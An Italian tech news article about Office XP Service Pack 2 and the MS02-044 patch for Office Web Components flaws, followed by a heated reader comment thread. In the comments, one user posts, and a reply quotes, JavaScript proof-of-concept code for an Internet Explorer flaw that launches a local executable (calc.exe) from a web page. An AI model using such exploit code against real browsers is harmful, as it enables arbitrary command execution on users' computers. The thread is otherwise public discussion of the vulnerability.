Office fra pacchi e bachi

Microsoft ha di recente rilasciato il secondo service pack per Office XP e una patch che corregge tre vulnerabilità legate ad un noto componente di Office


Redmond (USA) – A nove mesi di distanza dal rilascio del primo pacco , la scorsa settimana Microsoft ha pubblicato un nuovo service pack (SP2) per Office XP che, secondo quanto riportato nella relativa home page , “contiene significativi miglioramenti relativi alla protezione, alla stabilità e alle prestazioni”. Il pacchetto include tutte le patch rese disponibili dopo il rilascio dell’SP1, incluse alcune che non erano mai state rilasciate al pubblico.

Sebbene il nuovo service pack possa essere scaricato in versione integrale (15 MB) da qui , Microsoft suggerisce ai propri utenti di avvalersi del servizio ” Aggiornamento prodotti ” che, similmente a quanto fa Windows Update, verifica il livello di aggiornamento dei propri pacchetti e scarica solo gli update necessari. Il pacco, che può essere ordinato su CD, è anche disponibile nella versione per amministratori di rete

Il big di Redmond sostiene di essersi avvalsa, per lo sviluppo dell’SP2, del proficuo feedback degli utenti pervenuto sia attraverso il proprio servizio di supporto tecnico sia attraverso lo strumento ” Segnalazione errori ” incluso nell’ultima versione di Office.

Il nuovo service pack, che sarà necessario per l’installazione di tutti i futuri aggiornamenti ad Office XP, può essere applicato solo ai sistemi già aggiornati con l’ SP1 (scaricabile da qui ).

Subito a ridosso dell’SP2, Microsoft ha rilasciato una patch che corregge tre vulnerabilità di sicurezza, due delle quali classificate come “critical” e tutte relative al “famigerato” Office Web Components (OWC), una serie di controlli ActiveX che permettono agli utenti di accedere ad alcune delle funzionalità base di Office attraverso un browser Web, questo anche in assenza della suite di Microsoft.

Le tre falle, che riguardano alcune funzioni fornite dalla versione 2000 e 2002 dell’OWC – Host() , LoadText() e Copy()/Paste() – possono consentire ad un aggressore di eseguire comandi del sistema operativo con gli stessi diritti dell’utente locale, leggere qualsiasi file presente sul sistema vittima e leggere i testi contenuti nel buffer della clipboard.

Il componente OWC viene utilizzato da una vasta gamma di applicativi Microsoft, fra cui le versioni più recenti di BackOffice, BizTalk, Commerce Server, Small Business Server, Money e Project.

La società di sicurezza GreyMagic Software sostiene di aver sottoposto le tre vulnerabilità a Microsoft almeno cinque mesi fa, un arco di tempo durante il quale anche il ben noto cacciatore di bachi Georgi Guninski ha più volte criticato la sicurezza del componente OWC.

La patch, descritta nel bollettino di sicurezza MS02-044 , può essere scaricata da qui o attraverso il servizio Office Product Updates .

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    icetw0o
    c'era da aspettarselo...è vero ke le vulnerabilità di un programma devono essere "scoperte" con l'utilizzo ma a questo punto mi sembra eccessivo...ora mi kiedo...pur sapendo già la risposta...micro$oft ke rilascia a fare applicativi insicuri così in fretta senza neppure testarli come si deve? vedi winXP - vedi winME - vedi le varie versioni di internet explorer etc..etc.....la risposta è kiara e semplice..BUSINESS e $, tanti $ ! Possibile ke non si riesca a sviluppare un software su cui lavorare senza aver fretta di passare ad una nuova versione ke magari per qualke sciocchezza costi parekkio d+ ?? Possibile se è firmata MICRO$OFT!
    • Anonimo scrive:
      Re: icetw0o (le domande dell'utonto incallito)
      - Scritto da: icetw0o
      c'era da aspettarselo...è vero ke le
      vulnerabilità di un programma devono essere
      "scoperte" con l'utilizzo ma a questo punto
      mi sembra eccessivo...ora mi kiedo...pur
      sapendo già la risposta...micro$oft ke
      rilascia a fare applicativi insicuri così in
      fretta senza neppure testarli come si deve?
      vedi winXP - vedi winME - vedi le varie
      versioni di internet explorer etc..etc..
      ...la risposta è kiara e semplice..BUSINESS
      e $, tanti $ ! Possibile ke non si riesca a
      sviluppare un software su cui lavorare senza
      aver fretta di passare ad una nuova versione
      ke magari per qualke sciocchezza costi
      parekkio d+ ?? Possibile se è firmata
      MICRO$OFT!solite riflessioni dell'utonto che non capisce assolutamente niente di programmazione.potrei dilungarmi e perdere tempo prezioso per spiegarti la complessita computazionale necessaria per individuare tutti bug di un programma, la necessita di mantenere codice per supportare vecchie versioni di SO ecc......ma sei utonto quindi che vuoi capire c'è la patch istalla e ritorna a utontare.
      • Anonimo scrive:
        Re: icetw0o (le domande dell'utonto incallito)
        ihihihih... solo 2 cose...1) esponiti usa il tuo nome... nn nasconderti tanto nn ti kicka nessuno qui ;P2) vuoi dire ke nn è vero? Vuoi dirmi ke micro$oft nn pensa solo a lanciare un suo prodotto il + presto possibile? Io dico questo... microsoft sforna prodotti scadenti all'ordine del mese e poi ci lancia patch su patch...e ti sembra giusto? a questo punto l'utonto mi sembri tè ;P ihihihihihihihbaci e abbracci icetw0o...
        • Anonimo scrive:
          Re: icetw0o (le domande dell'utonto incallito)
          - Scritto da: icetw0o
          ihihihih... solo 2 cose...
          1) esponiti usa il tuo nome... nn
          nasconderti tanto nn ti kicka nessuno qui ;PPerche', "icetw0o" e' il tuo nome di battesimo, vero?
          2) vuoi dire ke nn è vero? Vuoi dirmi ke
          micro$oft nn pensa solo a lanciare un suo
          prodotto il + presto possibile?Senti, ma tu sei nel mondo del lavoro oppure vai all'asilo? Conosci forse aziende che non pensano alla produzione e al mercato?
          questo... microsoft sforna prodotti scadenti
          all'ordine del mese e poi ci lancia patch su
          patch...e ti sembra giusto? a questo punto
          l'utonto mi sembri tèLe patch sono quotidiane per QUALUNQUE software o sistema operativo, essendo un UTENTE linux dovresti ben saperlo.Ed essendo almeno un po' (credo) nel mondo dell'informatica penso che tu riesca a capire che non dipende stettamente dalle tempistiche di sviluppo (tranne in qualche caso tragico) ma e' endemico dei sistemi esposti in rete.Infatti, la stragrande maggioranza delle patch (Windows o Linux che siano, bada bene) avrai notato che riguardano buchi di sicurezza, e come ben sai, potresti lavorarci 20 anni in laboratorio ma alla fin fine, sul campo, qualche security bug lo si scova sempre (Windows o Linux che sia, ripeto).
          ;P ihihihihihihih
          baci e abbracci icetw0o...p.s. Cosa vuol dire "ihihihihihihih"? non conosco le abbreviazioni chattarole..Spero di essere stato comprensibile ed educatociao
      • Anonimo scrive:
        Re: icetw0o (le domande dell'utonto incallito)
        un'altra cosa...
        [...]la necessita di mantenere codice per
        supportare vecchie versioni di SO ecc...[...]Cioè ma dico...ci rendiamo conto? ;P vuoi dirmi ke internet explorer 6.x gira su un win3.x ? hiihihihihihi son storto io o è la città ke si è capovolta? =)) bah...mi sembra ke hai sbagliato UTONTO ;))) ciao amico ciao...
  • Anonimo scrive:
    E questa falla è sempre aperta...
    E' il colmo che non sia ancora stato patchato questo bug di IE, che esegue qualsiasi comando sul computer dell'utente.... (nell'esempio "c:/windows/system32/calc.exe") var ref = document.getElementById("dataObject").object;function ExecuteFile(){ref.location.href = "file://c:/fdbfd" + (new Date()).getTime();setTimeout("CheckFile()",1000);}function CheckFile(){var sHTML = HtmlInput.value.replace(/\$WHATFILE\$/, "c:/windows/system32/calc.exe" );ref.body.insertAdjacentHTML( "beforeEnd" , sHTML );}ExecuteFile()
    • Anonimo scrive:
      Re: E questa falla è sempre aperta (ma sei utonto)
      - Scritto da: Neo
      E' il colmo che non sia ancora stato
      patchato questo bug di IE, che esegue
      qualsiasi comando sul computer
      dell'utente.... (nell'esempio
      "c:/windows/system32/calc.exe")




      data="empty.html"
      style="width:1px;left:-10000px"




      var ref =
      document.getElementById("dataObject").object;

      function ExecuteFile(){
      ref.location.href = "file://c:/fdbfd" + (new
      Date()).getTime();
      setTimeout("CheckFile()",1000);
      }

      function CheckFile(){
      var sHTML =
      HtmlInput.value.replace(/\$WHATFILE\$/,
      "c:/windows/system32/calc.exe" );
      ref.body.insertAdjacentHTML( "beforeEnd" ,
      sHTML );
      }

      ExecuteFile()


      name="textarea"

      classid="clsid:11111111-1111-1111-1111-111111
      ma allora ci fai o ci sei, e la seconda volta che riscrivi la stessa idiozia.se tieni tutte le protezioni del browser a zero e ovvio che questo che e un finto problema ti si manifesta, alza le protezioni e vedrai che nessuno ti insidiera il pc.capisci che è inutile andare in giro con un carroarmato che ha tutte le botole aperte, chiudile, oppure che voi una patch che le chiuda per te alora sei utonto.
      • Anonimo scrive:
        Re: E questa falla è sempre aperta (ma sei utonto)
        L'installazione di default non prevede l'impostazione dei criteri di protezione a livello alto. Questo significa che, generalmente, questo attacco è tuttora possibile. Quelli che tu definisci utonti, sono in realtà la maggior parte degli utenti (non è mia intenzione essere offensivo, è solo una constatazione), ne segue che questa è una falla pericolosa per molte persone. Il problema sta nella filosofia con il quale IE è stato concepito, nessuna falla potrà rimediarvi.
        • Anonimo scrive:
          Re: E questa falla è sempre aperta (ma sei utonto)
          - Scritto da: nul
          L'installazione di default non prevede
          l'impostazione dei criteri di protezione a
          livello alto. Questo significa che,
          generalmente, questo attacco è tuttora
          possibile. Sbagliato.Anche solo aggiornando dalle versioni precedenti IE6 alza le protezioni fino a disabilitare addirittura i cookies, tanto che e' "tragedia" comune ritrovarsi gli accessi negati in molti siti e dover ricordarsi di andare nelle opzioni ad abilitarli (con prompt o senza...)Ma usando Linux forse non potevi saperlo... suppongo che tu ci abbia provato...
          Il problema sta nella filosofia con il quale
          IE è stato concepito, nessuna falla potrà
          rimediarvi.Il problema e' che molti parlano e scrivono tanto per passare il tempo, sarebbe meglio essere sicuri prima di sputtanare e/o sputtanarsi (non era questo il caso, comunque) Bye
          • Anonimo scrive:
            Re: E questa falla è sempre aperta (ma sei utonto)

            Sbagliato.
            Anche solo aggiornando dalle versioni precedenti IE6
            alza le protezioni fino a disabilitare addirittura i
            cookies, tanto che e' "tragedia" comune ritrovarsi
            gli accessi negati in molti siti e dover ricordarsi
            di andare nelle opzioni ad abilitarli (con prompt o
            senza...)Si scusa, non ero ancora corso ad aggiornarmi all'ultima versione di Internet Explorer. Malauguratamente utilizzo addirittura la 5.5!!In ogni caso su un altro pc con ie 6 ho voluto provare a selezionare, nelle opzioni di protezione, il livello predefinito e mi è stato selezionato il livello medio. Ed il problema si presentava ancora.Poi ho provato ad alzare il livello di protezione ad alto. Ed il problema non mi presentava più. Vorrei per elencarti le caratterisitche che Explorer riporta per tale livello:-Massima sicurezza per l'esplorazione ma minima praticità di utilizzo-Funzionalità a ridottta protezione non attive-Adatta per siti internet dal contenuto potenzialmente dannoso (ma come fai a spaerlo prima?)Lascio a voi ogni valutazione del caso.
            Ma usando Linux forse non potevi saperlo...
            suppongo che tu ci abbia provato...In realtà uso molto di più Microsoft che Linux
      • Anonimo scrive:
        Re: E questa falla è sempre aperta (ma sei utonto)
        E' la seconda volta che rispondi in maniera idiota. Non sono io che devo alzare le protezioni, è la Micro$oft che deve tappare il buco.Visto che vuoi un carro armato ben chiuso, prova a staccare la spina del tuo computer. Vedrai come navighi sicuro.Gli Active-x sono utili, ce ne sono però alcuni pericolosi che vanno sistemati. Se sei ustr**zo, non è colpa mia.
        • Anonimo scrive:
          Re: E questa falla è sempre aperta (ma sei utonto)
          - Scritto da: Neo
          E' la seconda volta che rispondi in maniera
          idiota. Non sono io che devo alzare le
          protezioni, è la Micro$oft che deve tappare
          il buco.
          Visto che vuoi un carro armato ben chiuso,
          prova a staccare la spina del tuo computer.
          Vedrai come navighi sicuro.
          Gli Active-x sono utili, ce ne sono però
          alcuni pericolosi che vanno sistemati. Se
          sei ustr**zo, non è colpa mia.Sbagliato.Vai a leggerti la mia risposta al post precendente.
Chiudi i commenti